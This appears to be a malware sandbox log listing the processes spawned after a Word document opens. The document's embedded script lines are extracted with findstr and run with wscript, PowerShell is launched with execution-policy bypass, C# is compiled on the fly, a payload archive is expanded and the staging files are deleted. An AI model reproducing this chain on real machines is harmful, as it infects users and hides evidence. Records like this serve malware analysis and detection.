WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc
212cmd.exe cmd /c cd /d %USERPROFILE% && type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" | findstr /r "^var" > y.js && wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
624cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" "
1532findstr.exe findstr /r "^var"
1940wscript.exe wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
2196cmd.exe "C:\Windows\System32\cmd.exe" /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
1868findstr.exe findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
1748cmd.exe "C:\Windows\System32\cmd.exe" /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
2368findstr.exe findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
2824wscript.exe "C:\Windows\System32\wscript.exe" yy.js
2872powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f ./y.ps1
2064csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jt6a_ory.cmdline"
1784cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES32BA.tmp" "c:\Users\test22\AppData\Local\Temp\CSC32AA.tmp"
1964cmd.exe cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp
460expand.exe expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp
1512cmd.exe cmd /c cd /d %USERPROFILE% && del /f /q y.*
2236